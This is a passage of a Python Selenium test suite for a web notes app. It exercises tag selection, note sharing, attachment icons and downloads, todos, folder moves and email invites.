    my_selected_tag = self.driver.find_element_by_css_selector(".tag_line_search ul.chzn-choices li.search-choice:first-child")
    self.assertEqual(my_selected_tag.text, tag_name)
    self.assertTrue(my_selected_tag.is_displayed())
    self._remove_item_without_ui(folder_data["global_id"])
def test_hide_selected_tag_from_tagslist(self):
    """Selecting a tag from the suggestion list must not change the
    number of entries shown in the list."""
    note_text = "<p>some text</p>"
    folder_name = self._get_random_name(16)
    folder_data = self._create_folder_without_ui(folder_name)["body"]["notes"][0]
    self.driver.refresh()
    time.sleep(4)
    folder = self._select_folder_by_name(folder_name)
    folder.click()
    time.sleep(2)
    self._create_note_without_ui(
        title=u"test_note",
        text=note_text,
        parent_id=folder_data["global_id"],
    )["body"]["notes"][0]
    time.sleep(4)
    folder.click()
    self.driver.refresh()
    time.sleep(2)
    edit_button = self.driver.find_element_by_css_selector('.head_note a.edit')
    time.sleep(2)
    edit_button.click()
    # Fixed: use the len() builtin instead of calling .__len__() directly.
    tags_before = self.driver.find_elements_by_css_selector(".tag_line_search ul.chzn-results li")
    count_before = len(tags_before)
    select = self.driver.find_element_by_css_selector('.tag_line_search ul .search-field input')
    select.click()
    time.sleep(1)
    select_tag = self.driver.find_element_by_css_selector('.tag_line_search ul.chzn-results li:first-child')
    select_tag.click()
    time.sleep(2)
    tags_after = self.driver.find_elements_by_css_selector(".tag_line_search ul.chzn-results li")
    self.assertEqual(count_before, len(tags_after))
    self._remove_item_without_ui(folder_data["global_id"])
def test_no_tags_dublicates_in_tags_list(self):
    """Creating a new tag must add exactly one entry to the tags list,
    with no duplicates after the list is closed and reopened."""
    note_text = "<p>some text</p>"
    folder_name = self._get_random_name(16)
    folder_data = self._create_folder_without_ui(folder_name)["body"]["notes"][0]
    self.driver.refresh()
    time.sleep(4)
    folder = self._select_folder_by_name(folder_name)
    folder.click()
    time.sleep(2)
    self._create_note_without_ui(
        title=u"test_note",
        text=note_text,
        parent_id=folder_data["global_id"],
    )["body"]["notes"][0]
    time.sleep(4)
    folder.click()
    self.driver.refresh()
    time.sleep(5)
    edit_button = self.driver.find_element_by_css_selector('.head_note .edit')
    edit_button.click()
    # Fixed: len() instead of .__len__(), and assertEqual instead of
    # assertTrue(a == b) for informative failure messages.
    count_before = len(self.driver.find_elements_by_css_selector(".tag_line_search ul.chzn-results li"))
    select = self.driver.find_element_by_css_selector('.tag_line_search ul .search-field input')
    select.click()
    time.sleep(1)
    tag_name = self._get_random_name(4)
    select.send_keys(tag_name)
    add_tag_button = self.driver.find_element_by_css_selector('li.no-results a')
    add_tag_button.click()
    count_after_add = len(self.driver.find_elements_by_css_selector(".tag_line_search ul.chzn-results li"))
    self.assertEqual(count_before + 1, count_after_add)
    my_selected_tag = self.driver.find_element_by_css_selector(".tag_line_search ul.chzn-choices li.search-choice:first-child")
    self.assertEqual(my_selected_tag.text, tag_name)
    self.assertTrue(my_selected_tag.is_displayed())
    # Close the tag widget and reopen it: the count must be unchanged.
    note_link = self.driver.find_element_by_css_selector('.tag_line_search .note_link')
    note_link.click()
    select = self.driver.find_element_by_css_selector('.tag_line_search ul .search-field input')
    select.click()
    time.sleep(1)
    count_after_reopen = len(self.driver.find_elements_by_css_selector(".tag_line_search ul.chzn-results li"))
    my_selected_tag = self.driver.find_element_by_css_selector(".tag_line_search ul.chzn-choices li.search-choice:first-child")
    self.assertEqual(count_before + 1, count_after_reopen)
    self.assertEqual(count_after_add, count_after_reopen)
    self.assertEqual(my_selected_tag.text, tag_name)
    self.assertTrue(my_selected_tag.is_displayed())
    self._remove_item_without_ui(folder_data["global_id"])
def _open_share_individuals_window(self, from_context = False):
    """Open the "share with individuals" dialog.

    When *from_context* is true the dialog is opened through the last
    folder's context menu; otherwise through the note header buttons.
    """
    if not from_context:
        share_button = self.driver.find_element_by_css_selector('.action_buttons.head_note li:nth-child(2)')
        share_button.click()
        return
    last_folder = self.driver.find_element_by_css_selector('.sub li:last-child')
    self._context_click(last_folder)
    context_share_button = self.driver.find_element_by_css_selector('.dropdown-menu li:nth-last-child(2) a')
    context_share_button.click()
def test_updating_text_note_after_saving(self):
    """Text typed into the editor must be present in the note body after
    saving and reloading the page."""
    folder_name = self._get_random_name(12)
    result = self._create_folder_without_ui(folder_name)
    time.sleep(3)
    self.driver.refresh()
    self.assertIsNotNone(result)
    folder = result["body"]["notes"][0]
    self.assertIsNotNone(folder)
    selected_folder = self._select_folder_by_name(folder['title'])
    selected_folder.click()
    time.sleep(2)
    # Fixed: use a context manager (and stop shadowing the `file`
    # builtin) so the handle is closed even if read() raises.
    with open("./fixtures/big_text.txt", "r") as fixture:
        text = fixture.read()
    self._create_note_without_ui(text=text, parent_id=folder["global_id"], title='1234')["body"]["notes"][0]
    time.sleep(4)
    selected_folder.click()
    self.driver.refresh()
    time.sleep(4)
    edit_button = self.driver.find_element_by_css_selector('.head_note .edit')
    edit_button.click()
    time.sleep(2)
    # Type extra text inside the TinyMCE iframe.
    editor_frame = self.driver.find_element_by_css_selector("#notes_text_ifr")
    self.driver.switch_to_frame(editor_frame)
    body = self.driver.find_element_by_css_selector("body")
    body.click()
    inputed_text = self._get_random_name(12)
    body.send_keys(inputed_text)
    self.driver.switch_to_default_content()
    save_button = self.driver.find_element_by_id('save_change_main')
    time.sleep(1)
    save_button.click()
    time.sleep(6)
    self.driver.refresh()
    time.sleep(4)
    note_text = self.driver.find_element_by_css_selector("#all_text p")
    # Bug fix: WebElement.text is a property, not a method -- the original
    # note_text.text() raised TypeError, so this check never actually ran.
    self.assertNotEqual(note_text.text.find(inputed_text), -1)
# def test_add_tag_with_enter_inFullWindow(self):
# note_text = u"Some text"
# folder_name = self._get_random_name(16)
# folder_data = self._create_folder_without_ui(folder_name)["body"]["notes"][0]
# self.driver.refresh()
# time.sleep(2)
# folder = self._select_folder_by_name(folder_name)
# folder.click()
# time.sleep(2)
# note_data = self._create_note_without_ui(
# title = u"test_note",
# text = note_text,
# global_id = self._get_random_name(16),
# parent_id=folder_data["global_id"]
# )["body"]["notes"][0]
# time.sleep(4)
# folder.click()
# self.driver.refresh()
# time.sleep(2)
#
# edit_button = self.driver.find_element_by_css_selector(".head_note a.edit")
# edit_button.click()
# time.sleep(5)
# select = self.driver.find_element_by_css_selector(".tag_line .tag_line_search form input")
# time.sleep(5)
# text = self._get_random_name(15)
# select.send_keys(text)
# time.sleep(3)
# ActionChains(self.driver).send_keys_to_element(select, Keys.ENTER).perform()
# time.sleep(2)
# save = self.driver.find_element_by_css_selector("#save_change_main")
# save.click()
# time.sleep(5)
# first_note = self.driver.find_element_by_css_selector(".notes_list li:first-child")
# ActionChains(self.driver).context_click(first_note).perform()
# dropdown = self.driver.find_element_by_css_selector(".dropdown-menu li:nth-child(3)")
# ActionChains(self.driver).click(dropdown).perform()
# selectinfull = self.driver.find_element_by_css_selector(".tag_line .tag_line_search form .chzn-choices li:nth-child(2)")
# self.assertTrue(selectinfull.is_enabled())
# self._remove_item_without_ui(folder_data["global_id"])
#
# def test_add_tag_in_current_list_inFullWindow(self):
# note_text = u"Some text"
# folder_name = self._get_random_name(16)
# folder_data = self._create_folder_without_ui(folder_name)["body"]["notes"][0]
# self.driver.refresh()
# time.sleep(2)
# folder = self._select_folder_by_name(folder_name)
# folder.click()
# time.sleep(2)
# note_data = self._create_note_without_ui(
# title = u"test_note",
# text = note_text,
# global_id = self._get_random_name(16),
# parent_id=folder_data["global_id"]
# )["body"]["notes"][0]
# time.sleep(4)
# folder.click()
# self.driver.refresh()
# time.sleep(3)
#
# first_note = self.driver.find_element_by_css_selector(".notes_list li:first-child")
# time.sleep(2)
# ActionChains(self.driver).context_click(first_note).perform()
# dropdown = self.driver.find_element_by_css_selector(".dropdown-menu li:nth-child(3)")
# dropdown.click()
# time.sleep(5)
# select = self.driver.find_element_by_css_selector("div .tag_line:nth-child(2) form input")
# select.click()
# time.sleep(3)
# select_tag = self.driver.find_element_by_css_selector("div .tag_line:nth-child(2) form .chzn-results li:first-child")
# selected_tag_name = select_tag.text
# select_tag.click()
# time.sleep(5)
# selectinfull = self._get_selectInFull()
# self.assertTrue(selectinfull.is_enabled())
# self.assertEqual(selectinfull.text, selected_tag_name)
# self._remove_item_without_ui(folder_data["global_id"])
#
# def test_add_tag_with_button_inFullWindow(self):
# note_text = u"Some text"
# folder_name = self._get_random_name(16)
# folder_data = self._create_folder_without_ui(folder_name)["body"]["notes"][0]
# self.driver.refresh()
# time.sleep(2)
# folder = self._select_folder_by_name(folder_name)
# folder.click()
# time.sleep(2)
# note_data = self._create_note_without_ui(
# title = u"test_note",
# text = note_text,
# global_id = self._get_random_name(16),
# parent_id=folder_data["global_id"]
# )["body"]["notes"][0]
# time.sleep(4)
# folder.click()
# self.driver.refresh()
# time.sleep(2)
#
# first_note = self.driver.find_element_by_css_selector(".notes_list li:first-child")
# time.sleep(2)
# ActionChains(self.driver).context_click(first_note).perform()
# time.sleep(1)
# ActionChains(self.driver).context_click(first_note).perform()
# time.sleep(1)
# dropdown = self.driver.find_element_by_css_selector(".dropdown-menu li:nth-child(3)")
# time.sleep(1)
# dropdown.click()
# time.sleep(5)
# select = self.driver.find_element_by_css_selector("div .tag_line:nth-child(2) form input")
# text = self._get_random_name(14)
# select.send_keys(text)
# time.sleep(3)
# click_on_plus = self.driver.find_element_by_css_selector("#addThisTag")
# click_on_plus.click()
# time.sleep(5)
# selectinfull = self._get_selectInFull()
# self.assertTrue(selectinfull.is_enabled())
# self._remove_item_without_ui(folder_data["global_id"])
#
# def test_for_targetBlank(self):
# self._create_folder_without_ui("target_Blank")
# self.driver.refresh()
# time.sleep(5)
# click_folder = self._select_folder_by_name("target_Blank")
# click_folder.click()
# time.sleep(3)
# new_note_button = self.driver.find_element_by_css_selector(".btn-wrapper button")
# new_note_button.click()
# time.sleep(3)
# editor_frame = self.driver.find_element_by_css_selector("#notes_text_ifr")
# self.driver.switch_to_frame(editor_frame)
# body = self.driver.find_element_by_css_selector("body")
# time.sleep(5)
# body.send_keys("https://www.google.com")
# ActionChains(self.driver).send_keys_to_element(body, Keys.ENTER).perform()
# time.sleep(4)
# self.driver.switch_to_default_content()
# save_button = self.driver.find_element_by_id('save_change_main')
# save_button.click()
# time.sleep(2)
# self.driver.refresh()
# time.sleep(10)
# click_folder = self._select_folder_by_name("target_Blank")
# click_folder.click()
# time.sleep(5)
# first_note = self.driver.find_element_by_css_selector(".notes_list li:first-child")
# time.sleep(2)
# ActionChains(self.driver).click(first_note).perform()
# time.sleep(2)
# share = self.driver.find_element_by_css_selector(".heading .action_buttons.head_note .share")
# share.click()
# time.sleep(5)
# link = self.driver.find_element_by_css_selector("#link_text_show")
# link_text = link.get_attribute("value")
# ok = self.driver.find_element_by_css_selector(".modal-footer button.btn.btn-success")
# ok.click()
# self.driver.get(link_text)
# time.sleep(10)
# note_text_link = self.driver.find_element_by_css_selector("#note_text_share p a")
# self.assertEqual(note_text_link.get_attribute("target"), "_blank")
# self._default_state()
# def test_saving_in_todo_list_when_add_todo(self):
# default_folder = self.driver.find_element_by_css_selector('.sub li[id="default"]')
# default_folder.click()
# time.sleep(1)
# default_folder.click()
# time.sleep(1)
# default_folder_name = self.driver.find_element_by_css_selector('.notes_content .sort_folder .jq-selectbox__select-text').text
# self.assertEqual('My Notes', default_folder_name)
#
# data = self._create_folder_and_note_with_image_attach(in_list = True, attach_name = 'attach-2.png')
#
# default_folder = self.driver.find_element_by_css_selector('.sub li[id="default"]')
# default_folder.click()
# time.sleep(1)
# self.assertEqual('My Notes', default_folder_name)
#
# new_folder = self.driver.find_element_by_css_selector('.sub li:last-child')
# new_folder.click()
# time.sleep(2)
# new_folder_name = self.driver.find_element_by_css_selector('.notes_content .sort_folder .jq-selectbox__select-text').text
# self.assertEqual(data[1]["title"], new_folder_name)
#
# self._remove_item_without_ui(data[1]["global_id"])
def test_check_google_analist_in_share_and_mine(self):
    """The Google Analytics script tag must be present both in the main
    client and on a shared-note page."""
    data = self._create_folder_and_note_with_image_attach(in_list=False, attach_name='attach-2.png')
    ga_script = self.driver.find_element_by_css_selector("script[src='http://www.google-analytics.com/ga.js']")
    self.assertTrue(ga_script.is_enabled())
    share_path = self._get_note_url_without_ui(data[0]["global_id"])["body"]["notes_shared"][0][data[0]["global_id"]]
    self.driver.get(self.url.replace("/client/", "") + share_path)
    ga_script = self.driver.find_element_by_css_selector("script[src='http://www.google-analytics.com/ga.js']")
    self.assertTrue(ga_script.is_enabled())
    self._default_state()
    self._remove_item_without_ui(data[1]["global_id"])
def test_check_show_hide_attach_menu_in_share(self):
    """The shared-note attachment menu is hidden while the note has no
    listed attachments and appears once one is uploaded."""
    data = self._create_folder_and_note_with_image_attach(in_list=False)
    note_id = data[0]["global_id"]
    share_path = self._get_note_url_without_ui(data[0]["global_id"])["body"]["notes_shared"][0][note_id]
    self.driver.get(self.url.replace("/client/", "") + share_path)
    attach_menu = self.driver.find_element_by_css_selector('.attaches_menu')
    self.assertFalse(attach_menu.is_displayed())
    fixture_file = self.check_fixture_file('114-1024.JPG')
    self._do_attachment_upload(fixture_file=fixture_file, note_id=note_id, in_list="True")
    self.driver.refresh()
    time.sleep(2)
    attach_menu = self.driver.find_element_by_css_selector('.attaches_menu')
    self.assertTrue(attach_menu.is_displayed())
    self._default_state()
    self._remove_item_without_ui(data[1]["global_id"])
def test_check_target_of_attach_item(self):
    """Attachment download links on a shared note must open in a new tab."""
    data = self._create_folder_and_note_with_image_attach(in_list=True)
    share_path = self._get_note_url_without_ui(data[0]["global_id"])["body"]["notes_shared"][0][data[0]["global_id"]]
    self.driver.get(self.url.replace("/client/", "") + share_path)
    download_link = self.driver.find_element_by_css_selector(".attaches_view_list .attach-download a")
    self.assertEqual(download_link.get_attribute("target"), '_blank')
    self.assertEqual(download_link.get_attribute("ng-target"), '_blank')
    self._default_state()
    self._remove_item_without_ui(data[1]["global_id"])
def test_check_img_for_every_attach_item(self):
    """Each attachment type gets its matching type icon in the shared view."""
    data = self._create_folder_and_note_with_image_attach(in_list = True)
    # Upload one attachment of each remaining type (audio, archive, generic file, video).
    attach_fname = ['attach-autio-1.mp3', 'attach-archive-1.zip', 'attach-file-1.elf', 'attach-video-1.flv']
    for i in attach_fname:
        fixture_file = self.check_fixture_file(i)
        attach = self._do_attachment_upload(fixture_file = fixture_file,
                                            note_id = data[0]["global_id"],
                                            in_list = "True")
    share_result = self._get_note_url_without_ui(data[0]["global_id"])["body"]["notes_shared"][0][data[0]["global_id"]]
    self.driver.get(self.url.replace("/client/", "") + share_result)
    attach_item = self.driver.find_elements_by_css_selector(".attaches_view_list .attach-download a img")
    index = 0
    # Count items whose icon src matches one of the known type icons.
    # Expected 5: the 4 uploads above plus the image attached by the helper.
    for i in attach_item:
        pattern = 'http://notes.everhelper.me/client/static/img/iconsOfAttachmentsTypes/'
        img_name = ['video_attach.png', 'archive_attach.png', 'audio_attach.png', 'file_attach.png', 'image_attach.png']
        for name in img_name:
            if pattern+name == i.get_attribute('src'):
                index = index + 1
                break
    self.assertEqual(index, 5)
    self._default_state()
    self._remove_item_without_ui(data[1]["global_id"])
def _create_folder_and_note_with_image_attach(self, in_list = False, attach_name = '114-1024.JPG',
                                              title = u'Default Title'):
    """Create a fresh folder plus a note carrying an image attachment.

    :param in_list: when False the attachment is embedded inline in the note
        body via an #attacheloc: img tag; when True it stays a list attachment.
    :param attach_name: fixture file name to upload.
    :param title: title for the created note.
    :return: [note_data, folder_data] server-response dicts; callers use
        data[0] for the note and data[1] for the folder cleanup.
    """
    folder_name = self._get_random_name(16)
    folder_data = self._create_folder_without_ui(folder_name)["body"]["notes"][0]
    self.driver.refresh()
    time.sleep(4)
    folder = self._select_folder_by_name(folder_name)
    folder.click()
    time.sleep(2)
    note_data = self._create_note_without_ui(
        title= title,
        parent_id= folder_data["global_id"]
    )["body"]["notes"][0]
    time.sleep(4)
    folder.click()
    note_id = note_data["global_id"]
    fixture_file = self.check_fixture_file(attach_name)
    attach = self._do_attachment_upload(fixture_file=fixture_file,
                                        note_id=note_id, in_list=in_list)
    attach_text = ""
    # Fail fast with the server's error message if the upload did not stick.
    if attach['body']['attachment'] is None:
        self.assertIsNotNone(attach['body']['attachment'], attach['body']['errorMessage'])
    if in_list == False:
        # Inline attachments are referenced from the note body markup.
        attach_text = '<img src="#attacheloc:'+attach['body']['attachment']['global_id']+'"/>'
    text_with_attach = '<p> some text'+ attach_text +'</p>';
    # Update the existing note (same global_id) with the attachment markup.
    note_data_2 = self._create_note_without_ui(
        title= title,
        text= text_with_attach,
        global_id= note_data["global_id"],
    )["body"]["notes"]
    time.sleep(4)
    created_note = self.driver.find_element_by_id(note_id)
    created_note.click()
    time.sleep(2)
    return [note_data, folder_data]
def test_check_hide_attach_menu_when_in_list_false(self):
    """Inline (in_list=False) attachments must not show the attach menu in the shared view."""
    data = self._create_folder_and_note_with_image_attach(in_list = False, attach_name = 'attach-2.png')
    share_result = self._get_note_url_without_ui(data[0]["global_id"])["body"]["notes_shared"][0][data[0]["global_id"]]
    self.driver.get(self.url.replace("/client/", "") + share_result)
    atach_menu = self.driver.find_element_by_css_selector('.attaches_menu')
    self.assertFalse(atach_menu.is_displayed())
    self._default_state()
    self._remove_item_without_ui(data[1]["global_id"])
def test_create_new_tab_to_click_on_img(self):
    """Clicking an inline image in the shared view must not break the page.

    NOTE(review): no assertion follows the click — this only verifies the
    click does not raise; confirm whether a new-tab check was intended.
    """
    data = self._create_folder_and_note_with_image_attach(in_list = False, attach_name = 'attach-2.png')
    share_result = self._get_note_url_without_ui(data[0]["global_id"])["body"]["notes_shared"][0][data[0]["global_id"]]
    self.driver.get(self.url.replace("/client/", "") + share_result)
    image = self.driver.find_element_by_css_selector("#note_text_share img")
    image.click()
    self._default_state()
    self._remove_item_without_ui(data[1]["global_id"])
def test_saving_in_todo_list_when_add_todo(self):
    """A todo typed into the note's todo widget appears in the saved list."""
    todo = "todo_example"
    data = self._create_folder_and_note_with_image_attach(in_list = True, attach_name = 'attach-2.png')
    todo_open_menu = self.driver.find_element_by_css_selector('.notes_content .todo')
    todo_open_menu.click()
    self.driver.implicitly_wait(1000)
    input_todo = self.driver.find_element_by_css_selector('.todo_text')
    input_todo.send_keys(todo)
    add_todo = self.driver.find_element_by_css_selector('.notes_content .btn-primary')
    add_todo.click()
    time.sleep(2)
    added_todo = self.driver.find_element_by_css_selector('form:last-child p:nth-child(2)')
    self.assertTrue(added_todo.is_displayed())
    self.assertEqual(todo, added_todo.text)
    self._remove_item_without_ui(data[1]["global_id"])
def test_move_note_to_another_folder(self):
    """Moving a note via the folder dropdown increments the target folder's note count."""
    data = self._create_folder_and_note_with_image_attach(in_list = True, attach_name = 'attach-2.png')
    # Remember how many notes the default folder holds before the move.
    default_folder = self.driver.find_element_by_css_selector('.sub li[id="default"]')
    time.sleep(2)
    default_folder.click()
    time.sleep(2)
    count_notes = self.driver.find_elements_by_css_selector('.notes_list li').__len__()
    new_folder = self.driver.find_element_by_css_selector('.sub li:last-child')
    new_folder.click()
    self.driver.get(self.url)
    time.sleep(5)
    # Re-assign the note's folder through the jq-selectbox dropdown (twice:
    # once in the sort view, once in the note view).
    folders_list = self.driver.find_element_by_css_selector('.sort_folder span:first-child .jq-selectbox__trigger-arrow')
    time.sleep(1)
    folders_list.click()
    time.sleep(2)
    default_folder_in_list = self.driver.find_element_by_css_selector('.notes_content .jq-selectbox__dropdown ul li:last-child')
    default_folder_in_list.click()
    time.sleep(3)
    folders_list = self.driver.find_element_by_css_selector('.notes_content .jq-selectbox__trigger-arrow')
    folders_list.click()
    time.sleep(3)
    default_folder_in_list = self.driver.find_element_by_css_selector('.notes_content .jq-selectbox__dropdown ul li:last-child')
    default_folder_in_list.click()
    time.sleep(1)
    count_notes_after_moving = self.driver.find_elements_by_css_selector('.notes_list li').__len__()
    self.assertEqual(count_notes+1, count_notes_after_moving)
    self._remove_item_without_ui(data[1]["global_id"])
def test_check_download_atribute_on_display_name(self):
    """The download attribute carries the original file name in both the
    editor view and the public shared view."""
    attach_name = '114-1024.JPG'
    data = self._create_folder_and_note_with_image_attach(in_list = True)
    open_attach_button = self.driver.find_element_by_css_selector('.btn.grey.attache.edit_mode.main_view')
    open_attach_button.click()
    download_attr_a = self.driver.find_element_by_css_selector('.notes_content .attachments_names a').get_attribute('download')
    self.assertEqual(download_attr_a, attach_name)
    share_result = self._get_note_url_without_ui(data[0]["global_id"])["body"]["notes_shared"][0][data[0]["global_id"]]
    self.driver.get(self.url.replace("/client/", "") + share_result)
    download_attr_b = self.driver.find_element_by_css_selector('.attachments_names a').get_attribute('download')
    self.assertEqual(download_attr_b, attach_name)
    download_attr_c = self.driver.find_element_by_css_selector('.attach-download a:nth-last-child(2)').get_attribute('download')
    self.assertEqual(download_attr_c, attach_name)
    self._remove_item_without_ui(data[1]["global_id"])
    self._default_state()
self._default_state()
def test_refresh_selected_folder_in_previu_when_delete_note(self):
    """Deleting one of two notes keeps the currently selected folder in the preview."""
    note_text = u"test text"
    folder_name = self._get_random_name(16)
    folder_data = self._create_folder_without_ui(folder_name)["body"]["notes"][0]
    self.driver.refresh()
    self.driver.implicitly_wait(4000)
    folder = self._select_folder_by_name(folder_name)
    folder.click()
    self.driver.implicitly_wait(2000)
    # Two notes in the same folder: delete one, the folder must stay selected.
    note1_data = self._create_note_without_ui(
        title = u"test_note",
        text = note_text,
        parent_id = folder_data["global_id"]
    )["body"]["notes"][0]
    note2_data = self._create_note_without_ui(
        title = u"test_note",
        text = note_text,
        parent_id = folder_data["global_id"]
    )["body"]["notes"][0]
    self.driver.implicitly_wait(2000)
    folder.click()
    self.driver.implicitly_wait(6000)
    second_note = self.driver.find_element_by_id(note1_data["global_id"])
    second_note.click()
    self.driver.implicitly_wait(2000)
    current_folder_name = self.driver.find_element_by_css_selector('.folderListView .jq-selectbox__select-text').text
    delete_button = self.driver.find_element_by_css_selector('.action_buttons.head_note li:last-child a')
    delete_button.click()
    button_delete_note = self.driver.find_element_by_css_selector("button.btn.btn-warning")
    self.assertIsNotNone(button_delete_note)
    button_delete_note.click()
    time.sleep(5)
    current_folder_name_after_remove = self.driver.find_element_by_css_selector('.folderListView .jq-selectbox__select-text').text
    self.assertEqual(current_folder_name, current_folder_name_after_remove)
    self._remove_item_without_ui(folder_data["global_id"])
def check_show_tags_list_button_position(self):
    """Verify tag-chooser widget dimensions in edit mode and via the context menu.

    NOTE(review): this method lacks the ``test_`` prefix, so unittest
    discovery never runs it — confirm whether it was disabled on purpose.
    """
    data = self._create_folder_and_note_with_image_attach(in_list = True)
    edit_button = self.driver.find_element_by_css_selector(".head_note a.edit")
    edit_button.click()
    time.sleep(5)
    # Pixel-exact layout checks for the chosen.js tag widget in edit mode.
    size_litle_list = self.driver.find_element_by_css_selector(".chzn-choices")
    self.assertEqual(size_litle_list.value_of_css_property('width'), '434px')
    self.assertEqual(size_litle_list.value_of_css_property('height'), '31px')
    chzn_results = self.driver.find_element_by_css_selector(".chzn-results")
    self.assertEqual(chzn_results.value_of_css_property('width'), '178px')
    self.assertEqual(chzn_results.value_of_css_property('height'), '190px')
    chzn_drop = self.driver.find_element_by_css_selector(".chzn-drop")
    self.assertEqual(chzn_drop.value_of_css_property('width'), '178px')
    self.assertEqual(chzn_drop.value_of_css_property('height'), '192px')
    # Same widget opened via the note's right-click context menu.
    first_note = self.driver.find_element_by_css_selector(".notes_list li:first-child")
    ActionChains(self.driver).context_click(first_note).perform()
    dropdown = self.driver.find_element_by_css_selector(".dropdown-menu li:nth-child(3) a")
    dropdown.click()
    time.sleep(4)
    size_litle_list = self.driver.find_element_by_css_selector(".chzn-choices")
    self.assertEqual(size_litle_list.value_of_css_property('width'), '434px')
    self.assertEqual(size_litle_list.value_of_css_property('height'), '31px')
    chzn_results = self.driver.find_element_by_css_selector(".chzn-results")
    self.assertEqual(chzn_results.value_of_css_property('width'), 'auto')
    self.assertEqual(chzn_results.value_of_css_property('height'), 'auto')
    chzn_drop = self.driver.find_element_by_css_selector(".chzn-drop")
    self.assertEqual(chzn_drop.value_of_css_property('width'), '178px')
    self.assertEqual(chzn_drop.value_of_css_property('height'), 'auto')
    self._remove_item_without_ui(data[1]["global_id"])
    self._default_state()
def check_moving_search_item_in_search(self):
    """Tag-search input shrinks after a tag is added (width 175px -> 74px).

    NOTE(review): this method lacks the ``test_`` prefix, so unittest
    discovery never runs it — confirm whether it was disabled on purpose.
    """
    # BUG FIX: _create_folder_and_note_with_image_attach() has no
    # ``folder_name`` parameter; passing one raised TypeError at call time.
    data = self._create_folder_and_note_with_image_attach(in_list = True)
    edit_button = self.driver.find_element_by_css_selector(".head_note a.edit")
    edit_button.click()
    time.sleep(5)
    # Widget dimensions before any tag exists.
    size_search_in_edit = self.driver.find_element_by_css_selector(".chzn-choices.edit_mode_search").size
    self.assertEqual(size_search_in_edit['width'], 372)
    self.assertEqual(size_search_in_edit['height'], 33)
    size_search_field_in_edit = self.driver.find_element_by_css_selector(".chzn-choices.edit_mode_search .search-field").size
    self.assertEqual(size_search_field_in_edit['width'], 175)
    self.assertEqual(size_search_field_in_edit['height'], 31)
    # Create a random tag through the widget.
    select = self.driver.find_element_by_css_selector("div .tag_line:nth-child(1) form .search-field input")
    select.click()
    text = self._get_random_name(14)
    select.send_keys(text)
    time.sleep(1)
    click_on_plus = self.driver.find_element_by_css_selector("#addThisTag")
    click_on_plus.click()
    self.driver.get(self.url)
    time.sleep(4)
    # Navigate to the new tag and reopen edit mode.
    tags_menu_item = self.driver.find_element_by_css_selector('.tags span')
    tags_menu_item.click()
    time.sleep(1)
    new_tag = self.driver.find_element_by_css_selector('.tags div .sub li:first-child')
    new_tag.click()
    time.sleep(4)
    edit_button = self.driver.find_element_by_css_selector(".head_note a.edit")
    edit_button.click()
    time.sleep(5)
    # The search field must have shrunk to make room for the tag chip.
    size_search_in_edit = self.driver.find_element_by_css_selector(".chzn-choices.edit_mode_search").size
    self.assertEqual(size_search_in_edit['width'], 372)
    self.assertEqual(size_search_in_edit['height'], 33)
    size_search_field_in_edit = self.driver.find_element_by_css_selector(".chzn-choices.edit_mode_search .search-field").size
    self.assertEqual(size_search_field_in_edit['width'], 74)
    self.assertEqual(size_search_field_in_edit['height'], 31)
    self._remove_item_without_ui(data[1]["global_id"])
    self._default_state()
def test_check_show_share_individuals_window(self):
    """The 'share with individuals' modal opens from the context menu."""
    data = self._create_folder_and_note_with_image_attach(in_list = True, attach_name = 'attach-2.png')
    self._open_share_individuals_window(from_context = True)
    invite_window = self.driver.find_element_by_css_selector('.modal.fade')
    self.assertTrue(invite_window.is_displayed())
    self._default_state()
    self._remove_item_without_ui(data[1]["global_id"])
def _create_invite(self, email = "example@i.ua"):
    """Open the share-individuals modal and send an invite to *email*."""
    self._open_share_individuals_window(from_context = True)
    email_textarea = self.driver.find_element_by_css_selector('input.invite_email_input')
    email_textarea.send_keys(email)
    send_button = self.driver.find_element_by_css_selector('.form_invites button.btn.blue')
    send_button.click()
    time.sleep(1)
def test_check_create_new_invite(self):
    """A freshly sent invite shows up in both the entered- and used-email lists."""
    email = "example@i.ua"
    data = self._create_folder_and_note_with_image_attach(in_list = True, attach_name = 'attach-2.png')
    self._create_invite(email = email)
    invite_email = self.driver.find_element_by_css_selector('.introdused_emails li p').text
    used_invite_email = self.driver.find_element_by_css_selector('.inviteright li').text
    self.assertEqual(invite_email, email)
    self.assertEqual(used_invite_email, email)
    self._default_state()
    self._remove_item_without_ui(data[1]["global_id"])
def test_check_delete_invite(self):
    """An invite can be removed via its hover delete button."""
    email = "example@i.ua"
    data = self._create_folder_and_note_with_image_attach(in_list = True, attach_name = 'attach-2.png')
    self._create_invite(email = email)
    invite_email = self.driver.find_element_by_css_selector('.introdused_emails li p').text
    self.assertEqual(invite_email, email)
    # The delete button only appears on hover.
    invite_item = self.driver.find_element_by_css_selector('.introdused_emails li')
    ActionChains(self.driver).move_to_element(invite_item).perform()
    time.sleep(1)
    remove_invite_but = self.driver.find_element_by_css_selector('span.delete_attach_btn')
    remove_invite_but.click()
    self._default_state()
    self._remove_item_without_ui(data[1]["global_id"])
def test_share_button_checkbox(self):
    """Password-protect a share via the checkbox, then reopen the share dialog.

    NOTE(review): this test creates a folder/note but never cleans them up,
    and its final state is only implicitly checked — confirm intent.
    """
    note_text = u"Some text"
    folder_name = self._get_random_name(16)
    folder_data = self._create_folder_without_ui(folder_name)["body"]["notes"][0]
    self.driver.refresh()
    time.sleep(2)
    folder = self._select_folder_by_name(folder_name)
    folder.click()
    time.sleep(2)
    note_data = self._create_note_without_ui(
        title = u"test_note",
        text = note_text,
        global_id = self._get_random_name(16),
        parent_id=folder_data["global_id"]
    )["body"]["notes"][0]
    time.sleep(4)
    folder.click()
    self.driver.refresh()
    time.sleep(5)
    share_unshare_button = self.driver.find_element_by_css_selector(".head_note a.share")
    self.assertIsNotNone(share_unshare_button)
    share_unshare_button.click()
    time.sleep(3)
    # Enable the password checkbox and submit a password for the share.
    checkbox = self.driver.find_element_by_css_selector(".squaredThree label")
    checkbox.click()
    password = self.driver.find_element_by_css_selector(".password")
    text = "password"
    password.send_keys(text)
    ok = self.driver.find_element_by_css_selector(".form_password button.blue")
    ok.click()
    share_button = self.driver.find_element_by_css_selector(".title_password .remove_select")
    share_unshare_button = self.driver.find_element_by_css_selector(".head_note a.share")
    self.assertIsNotNone(share_unshare_button)
    share_unshare_button.click()
    time.sleep(3)
    # ckeck_input = self.driver.find_element_by_css_selector(".squaredThree input")
def test_check_none_margine_when_viewing(self):
    """Paragraphs in view mode must carry no explicit margin CSS value."""
    note_text = "<p> </p> <p>sdsdsdsdsdsdsdsdsdsdsdsdd</p> <p>Some text</p>"
    folder_name = self._get_random_name(16)
    folder_data = self._create_folder_without_ui(folder_name)["body"]["notes"][0]
